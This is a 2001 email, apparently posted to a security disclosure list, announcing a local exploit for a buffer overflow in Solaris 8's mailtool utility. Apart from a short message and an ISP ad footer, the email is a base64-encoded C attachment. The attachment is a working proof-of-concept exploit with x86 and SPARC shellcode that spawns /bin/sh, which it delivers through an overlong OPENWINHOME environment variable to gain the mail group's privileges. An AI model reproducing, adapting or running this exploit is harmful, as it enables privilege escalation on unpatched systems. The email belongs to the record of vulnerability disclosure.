Date: Mon, 2 Jul 2001 17:32:32 +0200
From: "[email protected]" <[email protected]>
To: [email protected]Subject: Solaris mailtool exploit
--_=__=_XaM3_Boundary.994087952.2A.430623.42.15091.52.42.101010.22781
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Hello,
Here is a Solaris 8 (x86 and sparc) exploit I've coded
lately, out of an advisory dealing with a bug in the
mailtool utility (see the header of the attached .c file,
it says everything). As far as I know, such an exploit
has not been released so far.
Cheers :)
51
--------------
Profitez de l'offre sp=E9ciale Liberty Surf !
50 h / 95 F TTC par mois tout compris pendant 3 mois
http://register.libertysurf.fr/subscribe_fr/signup.php3
--_=__=_XaM3_Boundary.994087952.2A.430623.42.15091.52.42.101010.22781
Content-Type: application/octet-stream; name="mailt00l.c"
Content-Transfer-Encoding: base64
LyoNCm1haWx0MDBsLmMsIGJ5IDUxIChKdW5lIDIwMDEpDQoNClByb29mIG9mIGNvbmNlcHQg
Y29kZSwgZXhwbG9pdGluZyB0aGUgcmVjZW50bHkgZGlzY292ZXJlZCBidWZmZXIgb3ZlcmZs
b3cNCmluIFNvbGFyaXMgOCAvdXNyL29wZW53aW4vYmluL21haWx0b29sLCB5aWVsZGluZyBH
SUQgbWFpbA0KKGh0dHA6Ly9wYWNrZXRzdG9ybS5zZWN1cmlmeS5jb20vZ3JvdXBzL3N5bm5l
cmd5L21haWx0b29sLWFkdi50eHQpLg0KU2hvdWxkIHdvcmsgd2l0aCBib3RoIHg4NiBhbmQg
U3BhcmMgdmVyc2lvbnMsIHRoeCB0byBjb21waWxhdGlvbiBkaXJlY3RpdmVzLg0KQXMgYSBt
YXR0ZXIgb2YgY291cnNlLCB0aGUgZGVmYXVsdHMgYnVmZmVyc2l6ZSBhbmQgb2Zmc2V0IG1h
eSBuZWVkIHRvIGJlDQp0d2Vha2VkIGEgYml0Lg0KDQpVc2FnZSA6IC4vbWFpbHQwMGwgW2J1
ZmZlcnNpemVdIFtvZmZzZXRdDQoNClNob3V0cyB0byBUcmljayBmb3IgdmFyaW91cyBtZW50
b3JpbmcuLi4NCg0KbWFpbCA6IGtlcm5lbDUxQGxpYmVydHlzdXJmLmZyDQp3d3cuY3liZXJh
cm15LmNvbQ0Kd3d3LmcwdHIwMHQubmV0DQoqLw0KDQoNCg0KI2luY2x1ZGUgPHN0ZGxpYi5o
Pg0KDQojZGVmaW5lIERFRkFVTFRfT0ZGU0VUICAgICAgICAgICAgICAgICAwDQojZGVmaW5l
IERFRkFVTFRfQlVGRkVSX1NJWkUgICAgICAgICAgICAxNjAwDQoNCiNpZiBkZWZpbmVkKF9f
aTM4Nl9fKSAmJiBkZWZpbmVkKF9fc3VuX18pDQoNCiNkZWZpbmUgQVJDSCAieDg2IFN1biIN
CiNkZWZpbmUgTk9QX1NJWkUJMQ0KY2hhciBub3BbXSA9ICJceDkwIjsNCmNoYXIgc2hlbGxj
b2RlW10gPQ0KICAiXHhlYlx4M2JceDlhXHhmZlx4ZmZceGZmXHhmZlx4MDdceGZmXHhjM1x4
NWVceDMxXHhjMFx4ODlceDQ2XHhjMSINCiAgIlx4ODhceDQ2XHhjNlx4ODhceDQ2XHgwN1x4
ODlceDQ2XHgwY1x4MzFceGMwXHg1MFx4YjBceDE3XHhlOFx4ZGYiDQogICJceGZmXHhmZlx4
ZmZceDgzXHhjNFx4MDRceDMxXHhjMFx4NTBceDhkXHg1ZVx4MDhceDUzXHg4ZFx4MWVceDg5
Ig0KICAiXHg1ZVx4MDhceDUzXHhiMFx4M2JceGU4XHhjOFx4ZmZceGZmXHhmZlx4ODNceGM0
XHgwY1x4ZThceGM4XHhmZiINCiAgIlx4ZmZceGZmXHgyZlx4NjJceDY5XHg2ZVx4MmZceDcz
XHg2OFx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmYiDQogICJceGZmXHhmZiI7DQoNCnVu
c2lnbmVkIGxvbmcgZ2V0X3NwKHZvaWQpIHsNCiAgIF9fYXNtX18oIm1vdmwgJWVzcCwlZWF4
Iik7DQp9DQoNCiNlbGlmIGRlZmluZWQoX19zcGFyY19fKSAmJiBkZWZpbmVkKF9fc3VuX18p
DQoNCiNkZWZpbmUgQVJDSCAiU3VuIFNwYXJjIg0KI2RlZmluZSBOT1BfU0laRQk0DQovKiBT
aGVsbGNvZGUgcmlwcGVkIGZyb20gQWxlcGgxICovDQpjaGFyIG5vcFtdPSJceGFjXHgxNVx4
YTFceDZlIjsNCmNoYXIgc2hlbGxjb2RlW10gPQ0KICAiXHgyZFx4MGJceGQ4XHg5YVx4YWNc
eDE1XHhhMVx4NmVceDJmXHgwYlx4ZGNceGRhXHg5MFx4MGJceDgwXHgwZSINCiAgIlx4OTJc
eDAzXHhhMFx4MDhceDk0XHgxYVx4ODBceDBhXHg5Y1x4MDNceGEwXHgxMFx4ZWNceDNiXHhi
Zlx4ZjAiDQogICJceGRjXHgyM1x4YmZceGY4XHhjMFx4MjNceGJmXHhmY1x4ODJceDEwXHgy
MFx4M2JceDkxXHhkMFx4MjBceDA4Ig0KICAiXHg5MFx4MWJceGMwXHgwZlx4ODJceDEwXHgy
MFx4MDFceDkxXHhkMFx4MjBceDA4IjsNCg0KdW5zaWduZWQgbG9uZyBnZXRfc3Aodm9pZCkg
ew0KICBfX2FzbV9fKCJvciAlc3AsICVzcCwgJWkwIik7DQp9DQoNCiNlbmRpZg0KDQoNCmlu
dCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogIGNoYXIgKmV4WzJdOw0KICBj
aGFyICpidWZmLCAqcHRyOw0KICBsb25nICphZGRyX3B0ciwgYWRkcjsNCiAgaW50IG9mZnNl
dD1ERUZBVUxUX09GRlNFVCwgYnNpemU9REVGQVVMVF9CVUZGRVJfU0laRTsNCiAgaW50IGks
IG47DQoNCiAgaWYgKGFyZ2MgPiAxKSBic2l6ZSAgPSBhdG9pKGFyZ3ZbMV0pOw0KICBpZiAo
YXJnYyA+IDIpIG9mZnNldCA9IGF0b2koYXJndlsyXSk7DQoNCiAgcHJpbnRmKCJBcmNoaTog
JXNcbiIsIChjaGFyICopQVJDSCk7DQoNCiAgaWYgKCEoYnVmZiA9IG1hbGxvYyhic2l6ZSkp
KQ0KICAgIHsNCiAgICAgIHByaW50ZigiQ2FuJ3QgYWxsb2NhdGUgbWVtb3J5LlxuIik7DQog
ICAgICBleGl0KDApOw0KICAgIH0NCg0KICBhZGRyID0gZ2V0X3NwKCkgLSBvZmZzZXQ7DQog
IHByaW50ZigiVXNpbmcgYWRkcmVzczogMHgleFxuIiwgYWRkcik7DQoNCiAgcHRyID0gYnVm
ZjsNCiAgYWRkcl9wdHIgPSAobG9uZyAqKSBwdHI7DQogIGZvciAoaSA9IDA7IGkgPCBic2l6
ZTsgaSs9NCkNCiAgICAqKGFkZHJfcHRyKyspID0gYWRkcjsNCg0KICBwdHIgPSBidWZmOw0K
ICBmb3IgKGkgPSAwOyBpIDwgKGJzaXplIC0gc3RybGVuKHNoZWxsY29kZSkpIC8gMiAtIE5P
UF9TSVpFOyBpICs9IE5PUF9TSVpFKQ0KICAgIGZvciAobiA9IDA7IG4gPCBOT1BfU0laRTsg
bisrKSB7DQogICAgICAqKHB0cisrKSA9IG5vcFtuXTsNCiAgICB9DQoNCg0KICBmb3IgKGkg
PSAwOyBpIDwgc3RybGVuKHNoZWxsY29kZSk7IGkrKykNCiAgICAqKHB0cisrKSA9IHNoZWxs
Y29kZVtpXTsNCg0KICBidWZmW2JzaXplIC0gMV0gPSAnXDAnOw0KICBtZW1jcHkoYnVmZiwi
T1BFTldJTkhPTUU9IiwxMik7DQogIHB1dGVudihidWZmKTsNCiAgcHJpbnRmKCJOb3cgcnVu
bmluZzogL3Vzci9vcGVud2luL2Jpbi9tYWlsdG9vbFxuIik7DQogIGV4WzBdID0gIi91c3Iv
b3Blbndpbi9iaW4vbWFpbHRvb2wiOw0KICBleFsxXSA9IE5VTEw7DQogIGV4ZWN2KGV4WzBd
LCBleCk7DQp9DQoNCg0KDQo=
--_=__=_XaM3_Boundary.994087952.2A.430623.42.15091.52.42.101010.22781--
